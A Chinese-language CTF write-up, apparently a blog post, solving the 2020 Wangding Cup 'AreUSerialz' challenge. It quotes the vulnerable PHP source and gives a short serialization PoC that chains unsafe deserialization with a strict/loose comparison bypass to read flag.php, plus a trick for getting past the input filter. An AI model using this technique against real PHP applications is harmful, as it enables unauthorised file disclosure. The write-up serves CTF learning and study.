CTF--[网鼎杯 2020 青龙组]AreUSerialz

这个题目没什么难度，就是一个简单的php反序列化+php弱类型比较

根据题目提示猜测就可能是反序列化

打开题目给的是源码发现unserialize函数确定是反序列化

阅读源码寻找POP链

 <?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}public function process() {if($this->op == "1") {$this->write();//这里使用的是 == 弱类型判断 我们是要读取本目录下的flag.php的} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}
...private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: <br>";echo $s;}function __destruct() {//2.触发这个但是这里有一个修改值 我们根据后续发现$this->op应该要等于2的 因为等于2是读取文件//这里使用的是===绝对判断相等  结合后续使用的是==弱类型判断   所以这里可以进行绕过  这里是字符串进行比较，不是字符串和数字进行比较（因为我刚开始当作数字和字符串比较 一直无法绕过） 前面加空格即可// $this->op = " 2";  //  $this->filename = "flag.php";if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}
}
...
if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {//1.触发 __wakeup()和 __destruct()$obj = unserialize($str);}}

POC

class FileHandler {public $op;public $filename;function __construct() {$this->op = " 2";$this->filename = "flag.php";}
}
echo (serialize(new FileHandler()));

对咯！有一点为什么源码对变量的引用是protected而我是用的是public ？
首先，因为php v7.x反序列化的时候对访问类别不敏感，所以可以变化
其次，public变量直接变量名反序列化出来，protected变量\x00 + * + \x00 + 变量名，private变量\x00 + 类名 + \x00 + 变量名
题目中有一个is_valid有效性验证输入，要求必须在ASCII32-127可见字符内，但是\x00的ASCII码是0所以我们要使用public类型进行算是绕过吧

CTF--[网鼎杯 2020 青龙组]AreUSerialz相关推荐

[网鼎杯 2020 青龙组]AreUSerialz WP
[网鼎杯 2020 青龙组]AreUSerialz WP 看到题目,首先进入代码审计 <?phpinclude("flag.php");//在文件中插入flag.php文件的 ...
Buuctf[网鼎杯 2020 青龙组]AreUSerialz
[网鼎杯 2020 青龙组]AreUSerialz 打开题目仔细阅读源码 <?phpinclude("flag.php"); highlight_file(__FILE__) ...
[网鼎杯 2020 青龙组]AreUSerialz
打开题目,获得一大段代码 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {prote ...
[网鼎杯 2020 青龙组]AreUSerialz BUUCTF
源码如下,代码审计: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { pro ...
[网鼎杯 2020 青龙组]AreUSerialz 1
打开靶场,是一道php代码审计的题目,是个反序列化的题目分块对代码进行分析,先分析输入部分 function is_valid($s) {for($i = 0; $i < strlen($s) ...
undefsafe原型链[网鼎杯 2020 青龙组]notes
感觉是考原型链但还是有点不知道如何下手,呜呜呜呜呜呜. 从浅入深 Javascript 原型链与原型链污染 [网鼎杯 2020 青龙组]notes var express = require('exp ...
[网鼎杯 2020 青龙组]jocker
[网鼎杯 2020 青龙组]jocker SMC(self-Modifying Code): 自修改代码,程序在执行某段代码的过程中会对程序的代码进行修改,只有在修改后的代码才是可汇编,可执行的.在程 ...
BUUCTF Reverse/[网鼎杯 2020 青龙组]jocker
BUUCTF Reverse/[网鼎杯 2020 青龙组]jocker 先看下文件信息,没有加壳,32位程序运行一下,又是一道字符串比较的题目用IDA32位打开,分析一下 // positive ...
Buuctf [网鼎杯 2020 青龙组]jocker 题解
目录一.主函数逻辑二.wrong函数和omg函数--假flag 1.wrong函数 2.omg函数 3.假flag 三.encrypt和finally函数--真flag 1.打开sp指针偏移显示 ...
re -25 buuctf [网鼎杯 2020 青龙组]jocker
[网鼎杯 2020 青龙组]jocker 前话:ida7.6设置栏内没有general,可以通过ctrl+shift+p打开命令面板,搜索option打开设置选项,于Disassembly设置堆栈显示 ...

CTF--[网鼎杯 2020 青龙组]AreUSerialz

CTF--[网鼎杯 2020 青龙组]AreUSerialz相关推荐

最新文章

热门文章